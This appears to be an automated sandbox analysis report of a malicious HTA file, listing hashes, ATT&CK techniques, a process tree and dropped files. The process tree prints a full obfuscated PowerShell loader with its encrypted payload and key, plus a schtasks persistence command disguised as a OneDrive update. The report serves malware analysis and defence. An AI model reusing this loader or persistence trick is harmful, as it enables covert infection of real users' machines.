caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7

Analysis

max time kernel
0s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
13-02-2024 05:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta
Size

76KB
MD5

7e08e28d64e2026b8325935172c27c6b
SHA1

3be2858857ffba56416db3001a4f9a382a7404ec
SHA256

caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7
SHA512

816dd4906b26ac9fdaed836ca273588cac0d807868934715d500c3a9f8ad31bd11020d3a589d016a1c60c93fe714602f45963e78932b36ae1fa4cc54048190e9
SSDEEP

768:H0nzwRQmH5omBvaGGZFD9lu2drSX0kUG39UaZd4xJk0sS7:AzwGmHfBsZFDfu2dmX0kUmU/uS7

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3024	schtasks.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
PID:1460
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $SNTyz = 'AAAAAAAAAAAAAAAAAAAAALmk2b6lObDopuf9qJWqGCtzC7CpptCgBnt5rHGdK0CvSJKhFnvqJYIoDdgjV85+2qtRocrUk9BcXKKoE9JsNJgtMBltspO1u78Mfl7YMlQ0P6ZscPVex7HSoCRP10vd0aIFQ1RIYahKuYd6bdmAphNVCCPHUBzYTI7VBNdM83D7XZFoec+s23GTfZWtuLYtYiS/OTUEzlhOwnMxN3sP2n8EbAo9BGzEBkxFbuCbhHyPb0i1m4H+rOtXNkftKSWiPM4ZXhtfLWDXCtqRIJhHmHUZErlqLgiNahl0E0q5FgZZm7OPmMEoMyuXzOzt1+cRrN1Ctv6HcMAYuAhBzws+/DaLNhYS+WE4CDQVfS8Ok13+MLPrzW7O9DoG3TCRFMLBTGp+78w993AYJtFm12crbdAyk79fGa6dn8PRunfMPiXcbyo2OkAJQE/5Sd5Qu6Wk7Dmxy98RYGde8kwD9ip5r7gf6c1124Am/BEazQnaTet4zRGw963Te9Jey/4OUUf7n/wQFzO68GOZebttJyOyf7t0YP+Phce1GZBsIMJ8r/OAa1QCgIBQ3bvh+Wb7pC4r1Bu+UgwFMnLY+oWJUr3sUMzcwoEDJylcmUbX1Usq77b1fKmB201lgyr0PKGLEt3IORnPBhTD81gOlFbkTg2IfcheTlv3Xu9kzvd3D0LOjJ6UHpKh1u7DWwC4qflR5AUIjGX81KrOdsIj4I8cSzvTEUbFoOe/Merccz3NEtk5Aq1z0o9g5fFuBaXQvrhGFkyOkdNFzRiCJEGtBWCt4ssADBmv0Mp4PLNrPGKQ+GKQNdRRdnRYWVcdDlQjvqRQoSBqMbb0RVi1bkQLcO0ZooLIzLbzcmwfgDvTyVCk2p/3p5mAhvJIGg+WcG7kH76z2nvrBGoVqQUzcEx6MvAzDXDb/VDkrzZz5DN6h42PvwxThFmO926dcbjgZUumX1jUcIsr+Cm4IQxjQnyZAscmjTeJ4WKfIU3zpS5dKT2LTLVjDxVUzzqlTmd/rBgzYJcQl1dlkMzxPLgnpQq/Pwf3+iGIYoW6TLrCGfenlPxiURCdq0ejJLKErJg0tIF+CxtB+v3FETsTyH0UkR5J3TwQjZHsgGZFNQLNnkBTwpdQAOsdW+LTRyRcION9/NP5yk3ZQHcSQeiNfbC4vS8iCRrjSR31swF/MC7PANy+yO7STigHV+6S5OCbKezZXAWlClJUP+G0Zg==';$NYvzm = 'dE92WmpUelNoc1NyUHdadGdKY1lsaHNuQWxvanpYdVg=';$JxlzVEaB = New-Object 'System.Security.Cryptography.AesManaged';$JxlzVEaB.Mode = [System.Security.Cryptography.CipherMode]::ECB;$JxlzVEaB.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$JxlzVEaB.BlockSize = 128;$JxlzVEaB.KeySize = 256;$JxlzVEaB.Key = [System.Convert]::FromBase64String($NYvzm);$CcxpA = [System.Convert]::FromBase64String($SNTyz);$cnnQFgZm = $CcxpA[0..15];$JxlzVEaB.IV = $cnnQFgZm;$LEiiXZOgN = $JxlzVEaB.CreateDecryptor();$AcOIkQZxG = $LEiiXZOgN.TransformFinalBlock($CcxpA, 16, $CcxpA.Length - 16);$JxlzVEaB.Dispose();$BMBI = New-Object System.IO.MemoryStream( , $AcOIkQZxG );$mZNCUMQO = New-Object System.IO.MemoryStream;$NPwQahcaV = New-Object System.IO.Compression.GzipStream $BMBI, ([IO.Compression.CompressionMode]::Decompress);$NPwQahcaV.CopyTo( $mZNCUMQO );$NPwQahcaV.Close();$BMBI.Close();[byte[]] $kiEmVbL = $mZNCUMQO.ToArray();$tsWNTzTK = [System.Text.Encoding]::UTF8.GetString($kiEmVbL);$tsWNTzTK | powershell -
  2⤵
  PID:1980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
    3⤵
    PID:216
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"
      4⤵
      PID:4816
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        5⤵
        
        PID:3532
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7AADAA3DEFAD3581D4E15A74FACC59E7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7AADAA3DEFAD3581D4E15A74FACC59E7 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:4800
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=93064BCFC4C736FA730F7FA8A5575713 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:1092
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=538DBA59E9592183C5B415ABD3D3F1EF --mojo-platform-channel-handle=2316 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:376
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=F435BC065D5120ADB931B4B5DF934DF7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=F435BC065D5120ADB931B4B5DF934DF7 --renderer-client-id=5 --mojo-platform-channel-handle=1936 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:4360
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0086E8D3C00951786CC4C757FB4F969B --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:3096
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FF4BF2B0882A820F2152C765663E095D --mojo-platform-channel-handle=2816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:3308
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks.exe /TN 'MicrosoftOneDriveUpdateTaskMachine' /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON
      4⤵
      PID:4076
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /TN MicrosoftOneDriveUpdateTaskMachine /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON
        5⤵
        Creates scheduled task(s)
        
        PID:3024
  - - C:\Users\Admin\AppData\Roaming\tiago.exe
      "C:\Users\Admin\AppData\Roaming\tiago.exe"
      4⤵
      PID:3308

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
c26ed30e7d5ab440480838636efc41db

SHA1
c66e0d00b56abebfb60d2fcc5cf85ad31a0d6591

SHA256
6a3c5c4a8e57f77ecc22078fbf603ecc31fb82d429bd87b7b4b9261447092aef

SHA512
96cdb78bca3e01d4513c31661987e5646e6a8ff24708918aa0d66dfa3ca5d98af4862c9f38c4f41f933c345d2d3adfb1d34d1430b33f45f916f41a9872a030df

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
16KB

MD5
727a0e4ec05e400581c9245c957cb0a0

SHA1
c962266db9ece3408a39f3e79828eded523e0f49

SHA256
6c3292b60c9b18c52081fcdc7e52cbd3ce750ffd2eeb9f0cc427e1bf18a2a76b

SHA512
0874109d2086f19e25258fe0da266bed397da29ea91ec116e81818ca6a534f5906fe60cc7be06cdefc046635a3036187598101e8aa35eb9376699859906ad04c

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
18KB

MD5
cb6edf53f2973c2fea7c89b10a50b1e4

SHA1
f1a9c597650e0b66b45b1f14b0d11c5d2fb4a19b

SHA256
7037a0e23d7db126604e9fb9b68a0d22d27b47800acdc512babf3851601f4efb

SHA512
e0d5cabc80c93a30b246c3006b563b8a8c780cca3e6598ef32d10aac34be4df30b8b36527bda6ad46885775f7a1c4b10afc8635b3e6beacf21251b873584c1c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
28854213fdaa59751b2b4cfe772289cc

SHA1
fa7058052780f4b856dc2d56b88163ed55deb6ab

SHA256
7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915

SHA512
1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
25KB

MD5
5f4115cd4b2485fae4349c13a692015f

SHA1
f52fd7541f9e863cbc49afc0f88764c3b9deb61f

SHA256
a161588a9daebd89c57402e671a21c4f9e203ec8cf714fb256f12b84aacd3215

SHA512
fe56e86eea97c6e184b15ac902ddecb24b18d9b799ab83db57a65446bbb3ef80a36885b65ad414cdc6a1a00d8940bef45aba0ad021715a59d39c8650b0fe266e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
3cebe3f7d66bdc595d40344376eef3de

SHA1
c87eb9b976808cbfc19d8ae89f204092047c5258

SHA256
550297783f22f5f72a9e94ef48f9b2bba248dd4425f7988e70dc6d18b8a4be4a

SHA512
1c818fe69b5816013f91d59511a25aea21eb246ae69390ec9cca4a019298057a0c0c65c77e4dbaf5d4dda80a0e476ee01fc5ee17a63a2e6df88997fcbef58851

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yviotv0e.soo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
6KB

MD5
d93ba9e863e66af5bd0cbd60aa6cf40e

SHA1
3882bb5102e6640c7e5540928b9b9a5836f2f69d

SHA256
c3aeb1274ad9aceb7bec832b9a731b6fcaae8b22c8ef0c100007ca12eb596816

SHA512
9eab20b90d1453c6e743ab3524a7a421129f352800a4915c7d59a642e64e5b71f2962dfafbd2af313f5f17d99383b8b7408b62f5f9a18c3de2180c0e6190e5bb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
6KB

MD5
b59d0ad651ce457de583a6add96e27a3

SHA1
2a22d12d148a9f7fe2b2ded31d93366435ad70d1

SHA256
188afb2b888ee5eb749e97255aecea8765e1f16580163d5aebccfe6b36ce7ceb

SHA512
7fd54d307832ecc4d0c0d495ce973b012d753ba4a800122e12d13c737de1dc4234e1a039e58584cc880a21d62c9a720e0f9fc81e012154ac82767a2f9962c773

Download Submit
C:\Users\Admin\AppData\Roaming\sample.pdf

Filesize
18KB

MD5
da49bbe37855af62a6a8809453d17b83

SHA1
1f59e84376b2acda296b1b431a16e5cd5dfb7da8

SHA256
229defbb0cee6f02673a5cde290d0673e75a0dc31cec43989c8ab2a4eca7e1bb

SHA512
4aa87ac380cc78375170b08767edac27929fdacceeec84f555dd249239722064388803e675e0ec95c06487cd2c158b83cd768f08d61ee57515e5c52f191f7cd0

Download Submit
C:\Users\Admin\AppData\Roaming\tiago.exe

Filesize
60KB

MD5
da96430e12991c23c69023c29727bce2

SHA1
0bb644afcbd842ea950fc3f2748056b45435b2e9

SHA256
810e056dd33db55aea5801661b491d5fce54b6e6a988638cbe2a0c5234b8d471

SHA512
77f6cc91f27ff9251539927fb5309532a922108bffbb4480b38d9316757d571e06815fda0c0ec942b38979216857eaff93067d25d5291808313282c3035d96ae

Download Submit
C:\Users\Admin\AppData\Roaming\tiago.exe

Filesize
20KB

MD5
c97c16faa94d91227740a00bc70bf2a7

SHA1
f0712daf7626ad6ae568ac34f94d1155433af95a

SHA256
2edeb29ba10a50d74cb3808d8761b83ad97bbce9bfb7430757bb918d3c79b291

SHA512
d4353f72b7a5a911dbcb483203c0dcca798b7a752d8e68d989915e06dcbaf533f36da51c3dac5ec1df945b4c7bf9a281f40075f39e5897e252f7458d71f5d56b

Download Submit
C:\Users\Admin\AppData\Roaming\tiago.exe

Filesize
85KB

MD5
cf26eddf1f54bcc27ac295be9c0128ca

SHA1
a8df34cb134854914016e1229f40576c461da548

SHA256
9ff7571af67ae8d4e96fa46efb6f291d98434338069223a840332ecf6f04e216

SHA512
714a0657cb020a73ef08507cae596582f8ae353835099c99f618a07996e7805881f235725598006c237aedce32146035e152cce099d3d276a463c730fb7fa6a3

Download Submit
memory/216-123-0x0000000002750000-0x0000000002760000-memory.dmp

Filesize
64KB

Download
memory/216-43-0x000000007EE50000-0x000000007EE60000-memory.dmp

Filesize
64KB

Download
memory/216-25-0x0000000002750000-0x0000000002760000-memory.dmp

Filesize
64KB

Download
memory/216-26-0x0000000002750000-0x0000000002760000-memory.dmp

Filesize
64KB

Download
memory/216-36-0x0000000006FE0000-0x0000000007024000-memory.dmp

Filesize
272KB

Download
memory/216-37-0x00000000072B0000-0x0000000007326000-memory.dmp

Filesize
472KB

Download
memory/216-39-0x0000000007480000-0x00000000074A2000-memory.dmp

Filesize
136KB

Download
memory/216-40-0x00000000085E0000-0x0000000008B84000-memory.dmp

Filesize
5.6MB

Download
memory/216-38-0x00000000074D0000-0x0000000007566000-memory.dmp

Filesize
600KB

Download
memory/216-45-0x000000006D9D0000-0x000000006DA1C000-memory.dmp

Filesize
304KB

Download
memory/216-46-0x000000006DB30000-0x000000006DE84000-memory.dmp

Filesize
3.3MB

Download
memory/216-246-0x0000000071130000-0x00000000718E0000-memory.dmp

Filesize
7.7MB

Download
memory/216-59-0x00000000080D0000-0x0000000008173000-memory.dmp

Filesize
652KB

Download
memory/216-221-0x000000007EE50000-0x000000007EE60000-memory.dmp

Filesize
64KB

Download
memory/216-57-0x0000000002750000-0x0000000002760000-memory.dmp

Filesize
64KB

Download
memory/216-65-0x00000000081C0000-0x00000000081CA000-memory.dmp

Filesize
40KB

Download
memory/216-139-0x0000000002750000-0x0000000002760000-memory.dmp

Filesize
64KB

Download
memory/216-118-0x0000000071130000-0x00000000718E0000-memory.dmp

Filesize
7.7MB

Download
memory/216-81-0x0000000008230000-0x0000000008244000-memory.dmp

Filesize
80KB

Download
memory/216-83-0x0000000008260000-0x0000000008268000-memory.dmp

Filesize
32KB

Download
memory/216-56-0x00000000080B0000-0x00000000080CE000-memory.dmp

Filesize
120KB

Download
memory/216-44-0x0000000008070000-0x00000000080A2000-memory.dmp

Filesize
200KB

Download
memory/216-79-0x0000000008200000-0x0000000008211000-memory.dmp

Filesize
68KB

Download
memory/216-24-0x0000000071130000-0x00000000718E0000-memory.dmp

Filesize
7.7MB

Download
memory/216-80-0x0000000008220000-0x000000000822E000-memory.dmp

Filesize
56KB

Download
memory/216-82-0x0000000008270000-0x000000000828A000-memory.dmp

Filesize
104KB

Download
memory/1980-5-0x00000000048A0000-0x00000000048B0000-memory.dmp

Filesize
64KB

Download
memory/1980-117-0x00000000048A0000-0x00000000048B0000-memory.dmp

Filesize
64KB

Download
memory/1980-3-0x0000000071130000-0x00000000718E0000-memory.dmp

Filesize
7.7MB

Download
memory/1980-14-0x00000000056A0000-0x0000000005706000-memory.dmp

Filesize
408KB

Download
memory/1980-8-0x00000000055C0000-0x0000000005626000-memory.dmp

Filesize
408KB

Download
memory/1980-21-0x0000000005CA0000-0x0000000005CEC000-memory.dmp

Filesize
304KB

Download
memory/1980-121-0x00000000048A0000-0x00000000048B0000-memory.dmp

Filesize
64KB

Download
memory/1980-2-0x00000000047F0000-0x0000000004826000-memory.dmp

Filesize
216KB

Download
memory/1980-20-0x0000000005C60000-0x0000000005C7E000-memory.dmp

Filesize
120KB

Download
memory/1980-19-0x0000000005810000-0x0000000005B64000-memory.dmp

Filesize
3.3MB

Download
memory/1980-249-0x0000000071130000-0x00000000718E0000-memory.dmp

Filesize
7.7MB

Download
memory/1980-4-0x0000000004EE0000-0x0000000005508000-memory.dmp

Filesize
6.2MB

Download
memory/1980-87-0x0000000071130000-0x00000000718E0000-memory.dmp

Filesize
7.7MB

Download
memory/1980-23-0x0000000006D40000-0x0000000006D5A000-memory.dmp

Filesize
104KB

Download
memory/1980-7-0x0000000004DC0000-0x0000000004DE2000-memory.dmp

Filesize
136KB

Download
memory/1980-6-0x00000000048A0000-0x00000000048B0000-memory.dmp

Filesize
64KB

Download
memory/1980-22-0x00000000075A0000-0x0000000007C1A000-memory.dmp

Filesize
6.5MB

Download
memory/4076-68-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/4076-78-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/4076-86-0x0000000071130000-0x00000000718E0000-memory.dmp

Filesize
7.7MB

Download
memory/4076-66-0x0000000071130000-0x00000000718E0000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads